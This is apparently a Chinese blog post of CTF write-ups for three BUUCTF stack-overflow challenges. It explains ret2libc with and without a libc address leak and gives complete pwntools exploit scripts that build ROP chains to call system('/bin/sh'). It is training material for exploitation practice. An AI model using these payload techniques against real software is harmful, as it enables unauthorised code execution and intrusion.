ret2libc-泄露和不需要泄露

最新推荐文章于 2023-12-11 20:18:06 发布
最新推荐文章于 2023-12-11 20:18:06 发布
阅读量233 收藏 1
点赞数
分类专栏: pwn stack 文章标签: 安全漏洞 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/124250441
版权
pwn 同时被 2 个专栏收录
9 篇文章 0 订阅
订阅专栏
stack
1 篇文章 0 订阅
订阅专栏

ciscn_2019_c_1 —需要泄露got
题目可在buuctf下载
安全检查,发现只开了NX保护(DEP)
在这里插入图片描述

执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆))
在这里插入图片描述

IDA查看反汇编代码
在这里插入图片描述

加密函数
其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址
也就是后面会变的只有比上一次输入长的部分
在这里插入图片描述

操作如下图
在这里插入图片描述

由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地址就OK了,看起来是ret2libc,,所以现在要做的是先泄露地址
并且可以看到距离返回地址距离为0x58

在这里插入图片描述

可以看到打印的是第一次发送之后加密过后的,,
可以通过逆向的进行算法的解密,然后就可以把地址放上去了
在这里插入图片描述

但是这个打印的是got而不是got里面的内容,所以需要打印got(将got作为参数指针传进去)
但是经过逆向解密太麻烦了,由于使用的是strlen函数所以可以通过‘\x00‘绕过(淦第一时间没想到)
然后我们想要执行的是put函数,got地址作为参数,由于x64使用寄存器传递参数,所以需要找到pop rdi,但是为了能够控制控制流,所以需要ret,所以此时的参数应该为:
buffer+pop_rdi_ret_addr(第一次返回地址) + got参数 + put(相当于是第2个返回地址)+第3个返回地址(为了控制再次执行到漏洞函数)

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
搜的偏移报错。。。,使用libc的话就把那注释的取消掉就行了

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

name = './ciscn_2019_c_1'
ciscn = ELF(name)
#libc = ELF('./libc.so.6')
#p = process(name)
p = remote("node4.buuoj.cn","25957")

pop_rid_ret = 0x400c83
main_addr = 0x400B28
put_plt = ciscn.plt['puts']
put_got = ciscn.got['puts']#602020
ret = 0x4006b9

p.recvuntil("machine\n")
p.sendline('1')
p.recvuntil("encrypted")
payload = b"\x00"
payload += b"a"*(0x58-1) + p64(pop_rid_ret) + p64(put_got) + p64(put_plt)  + p64(main_addr)

p.sendline(payload)
p.recvuntil('Ciphertext\n\n')	
#print(p.recv())
puts_addr = u64(p.recv(7)[:-1].ljust(8,b'\x00'))

print("put_addr is ",hex(puts_addr))
#libc = LibcSearcher('puts',puts_addr)
#sys_libc = libc.dump('system')
#bin_sh_libc = libc.dump('str_bin_sh')
#puts_libc = libc.dump('puts')
#system_addr = puts_addr + (sys_libc - puts_libc)
#bin_sh_addr = puts_addr + (bin_sh_libc - puts_libc)

libcbase = puts_addr - 0x06f6a0 
system_addr = libcbase + 0x0453a0
bin_sh_addr = libcbase + 0x18ce17

p.recvuntil("machine\n")
p.sendline('1')
p.recvuntil("encrypted")
payload = b"\x00"
payload += b"a"*(0x58-1) + p64(ret) +p64(pop_rid_ret) + p64(bin_sh_addr) + p64(system_addr) 
p.sendline(payload)

#gdb.attach(p)

p.interactive()

buuctf level2 ----简单,不需要泄露

查看保护,,发现只开了NX,RELRO (多半可以使用ret2libc了)

IDA查看
还挺友好的,漏洞函数都给标明了
在这里插入图片描述

还有个明显的溢出。。。。

返回地址距离8c

所以就很简单了,直接运行system(binsh)就行了
在这里插入图片描述

from pwn import *
context.log_level = 'debug'
name = './level2'
ciscn = ELF(name)

p = process(name)
#p = remote("node4.buuoj.cn","28065")
system_addr = 0x8048320
bin_sh_addr = 0x804a024

payload = 'a'*0x8c + p32(system_addr) + p32(0) +  p32(bin_sh_addr)
p.sendlineafter("Input:",payload)


p.interactive()

ciscn_2019_ne_5

检查保护,开启了NX

然后IDA,发现是菜单题,但是并不是堆
首先会验证字符串是否相等,然后跳到菜单

漏洞函数在getFlag,拷贝的时候会造成溢出
如下可以确定偏移为76

在这里插入图片描述
在这里插入图片描述

并且存在system,但是没有bin_sh字符串,但是存在sh

from pwn import *
#from LibcSearcher import *
#context.log_level = 'debug'

name = './ciscn_2019_ne_5'
ciscn = ELF(name)
libc = ELF('./libc.so.6')
#p = process(name)
p = remote("node4.buuoj.cn","29836")

def addLog(s):
	p.sendlineafter(":",'1')
	p.sendlineafter("info:",s)

def Display():
	p.sendlineafter(":",'2')###put(s)

def system():
	p.sendlineafter(":",'3')###system()
def getFlag():
	p.sendlineafter(":",'4')

sh_addr = 0x80482EA
system_addr = 0x080484D0
p.sendlineafter("password:",b"administrator")


payload = 'a'*76 + p32(system_addr) + p32(sh_addr)*2
addLog(payload)

getFlag()



p.interactive()

一些图片显示不出来,,,可以从从这看

其他

是脆脆啊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
level3(xctf)
weixin_43868725的博客
05-06 463
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出。 0x1 利用过程 整个程序中没有我们能利用的部分,但是题目给我们提供了一个libc。所以可以通过泄露got表的地址获取libc的基地址。libc中有system()函数,还有"/bin/sh"。因此我们先使用write()泄露got表中的地址计算出libc的基地址调用完成之后返...
BUUCTF的第二题rip&一道ret2libc
I_ET5u5的博客
12-11 227
buuctf的第二题和一道ret2libc的小难点
ret2shellcode 的泄露puts@got
wing_7的博客
10-08 1023
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现read@got.pltb保存了read函数的blic中的地址。call read—> read的plt表 —>read的got表。jmp到的其实这是plt表对应函数的got表。
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 397
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
ret2-libc-puts64
04-01
ret2-libc-puts64
ret2-libc3-puts
04-01
ret2-libc3-puts
ret-libc3-write
最新发布
04-01
ret-libc3-write
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
ret2libc2pwn 入门题
02-11
pwn 入门题
BUUCTF--pwn--[OGeek2019]babyrop【ret2libc
qq_73149934的博客
12-06 221
BUUCTF--pwn--[OGeek2019]babyrop
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 367
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF--pwn--jarvisoj_level3【ret2libc
qq_73149934的博客
12-04 275
BUUCTF--pwn--jarvisoj_level3
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 250
BUUCTF--pwn--ciscn_2019_c_1
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2396
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 305
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
PWN题型之Ret2Libc
swedsn
03-18 4073
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5832
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 654
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
pwn ret2libc原理
08-22
总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值